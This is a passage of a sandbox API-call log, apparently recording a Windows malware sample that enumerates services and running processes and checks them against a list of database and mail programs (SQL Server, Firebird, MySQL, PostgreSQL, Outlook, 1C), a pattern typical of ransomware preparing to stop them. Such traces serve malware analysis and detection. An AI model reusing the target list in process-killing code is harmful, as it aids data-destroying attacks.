(lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0034.657] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0034.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0034.657] lstrlenW (lpString="Netman") returned 6 [0034.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0034.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0034.657] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0034.657] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0034.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0034.657] lstrlenW (lpString="netprofm") returned 8 [0034.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0034.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0034.657] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0034.657] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0034.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0034.657] lstrlenW (lpString="NlaSvc") returned 6 [0034.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0034.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0034.657] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0034.657] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0034.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0034.657] lstrlenW (lpString="nsi") returned 3 [0034.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0034.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0034.657] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0034.657] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0034.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0034.657] lstrlenW (lpString="PcaSvc") returned 6 [0034.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0034.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0034.657] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0034.657] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0034.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0034.657] lstrlenW (lpString="PlugPlay") returned 8 [0034.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0034.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0034.658] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0034.658] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0034.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0034.658] lstrlenW (lpString="Power") returned 5 [0034.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0034.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0034.658] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0034.658] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0034.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0034.658] lstrlenW (lpString="ProfSvc") returned 7 [0034.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0034.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0034.658] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0034.658] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0034.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0034.658] lstrlenW (lpString="RpcEptMapper") returned 12 [0034.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0034.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0034.658] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0034.658] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0034.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0034.658] lstrlenW (lpString="RpcSs") returned 5 [0034.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0034.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0034.658] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0034.658] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0034.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0034.658] lstrlenW (lpString="SamSs") returned 5 [0034.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0034.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0034.658] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0034.659] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0034.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0034.659] lstrlenW (lpString="Schedule") returned 8 [0034.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0034.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0034.659] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0034.659] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0034.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0034.659] lstrlenW (lpString="SENS") returned 4 [0034.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0034.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0034.659] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0034.659] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0034.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0034.659] lstrlenW (lpString="ShellHWDetection") returned 16 [0034.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0034.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0034.659] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0034.659] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0034.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0034.659] lstrlenW (lpString="Spooler") returned 7 [0034.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0034.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0034.659] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0034.659] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0034.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0034.659] lstrlenW (lpString="SysMain") returned 7 [0034.659] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0034.659] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0034.659] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0034.659] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0034.659] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0034.659] lstrlenW (lpString="Themes") returned 6 [0034.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0034.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0034.660] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0034.660] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0034.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0034.660] lstrlenW (lpString="TrkWks") returned 6 [0034.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0034.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0034.660] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0034.660] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0034.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0034.660] lstrlenW (lpString="UxSms") returned 5 [0034.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0034.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0034.660] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0034.660] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0034.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0034.660] lstrlenW (lpString="VSS") returned 3 [0034.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0034.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0034.660] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0034.660] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0034.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0034.660] lstrlenW (lpString="WdiServiceHost") returned 14 [0034.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0034.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0034.660] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0034.660] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0034.660] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0034.660] lstrlenW (lpString="WdiSystemHost") returned 13 [0034.660] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0034.660] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0034.660] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0034.660] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0034.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0034.661] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0034.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0034.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0034.661] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0034.661] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0034.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0034.661] lstrlenW (lpString="Winmgmt") returned 7 [0034.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0034.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0034.661] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0034.661] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0034.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0034.661] lstrlenW (lpString="WPDBusEnum") returned 10 [0034.661] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0034.661] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0034.661] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0034.661] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0034.661] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0034.661] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3857378 | out: hHeap=0x5d0000) returned 1 [0034.661] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c [0034.664] Process32FirstW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0034.665] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0034.665] lstrlenW (lpString="System") returned 6 [0034.665] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0034.665] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0034.665] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0034.665] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0034.665] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0034.665] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0034.665] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0034.665] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0034.666] lstrlenW (lpString="smss.exe") returned 8 [0034.666] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0034.666] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0034.666] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0034.666] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0034.666] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0034.666] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0034.666] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0034.666] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0034.667] lstrlenW (lpString="csrss.exe") returned 9 [0034.667] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0034.667] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0034.667] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0034.667] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0034.667] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0034.667] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0034.667] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0034.667] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0034.668] lstrlenW (lpString="wininit.exe") returned 11 [0034.668] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0034.668] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0034.668] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0034.668] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0034.668] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0034.668] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0034.668] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0034.668] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0034.669] lstrlenW (lpString="csrss.exe") returned 9 [0034.669] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0034.669] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0034.670] lstrlenW (lpString="winlogon.exe") returned 12 [0034.670] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0034.670] lstrlenW (lpString="services.exe") returned 12 [0034.670] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0034.671] lstrlenW (lpString="lsass.exe") returned 9 [0034.671] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0034.672] lstrlenW (lpString="lsm.exe") returned 7 [0034.672] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.672] lstrlenW (lpString="svchost.exe") returned 11 [0034.672] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.673] lstrlenW (lpString="svchost.exe") returned 11 [0034.673] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.674] lstrlenW (lpString="svchost.exe") returned 11 [0034.674] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.674] lstrlenW (lpString="svchost.exe") returned 11 [0034.674] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.675] lstrlenW (lpString="svchost.exe") returned 11 [0034.675] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0034.676] lstrlenW (lpString="audiodg.exe") returned 11 [0034.676] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.676] lstrlenW (lpString="svchost.exe") returned 11 [0034.676] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.677] lstrlenW (lpString="svchost.exe") returned 11 [0034.677] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0034.678] lstrlenW (lpString="dwm.exe") returned 7 [0034.678] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0034.678] lstrlenW (lpString="explorer.exe") returned 12 [0034.678] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0034.679] lstrlenW (lpString="spoolsv.exe") returned 11 [0034.679] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0034.680] lstrlenW (lpString="taskhost.exe") returned 12 [0034.680] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.680] lstrlenW (lpString="svchost.exe") returned 11 [0034.680] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0034.681] lstrlenW (lpString="taskeng.exe") returned 11 [0034.681] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0034.682] lstrlenW (lpString="taskhost.exe") returned 12 [0034.682] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0034.682] lstrlenW (lpString="carried trinity.exe") returned 19 [0034.682] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0034.683] lstrlenW (lpString="heaven.exe") returned 10 [0034.683] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0034.684] lstrlenW (lpString="dell.exe") returned 8 [0034.684] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0034.684] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0034.684] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0034.685] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0034.685] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0034.686] lstrlenW (lpString="til ear equal.exe") returned 17 [0034.686] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0034.686] lstrlenW (lpString="itunes-bring.exe") returned 16 [0034.686] Process32NextW (in: hSnapshot=0x19c, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0034.823] lstrlenW (lpString="tide_instances_ee.exe") 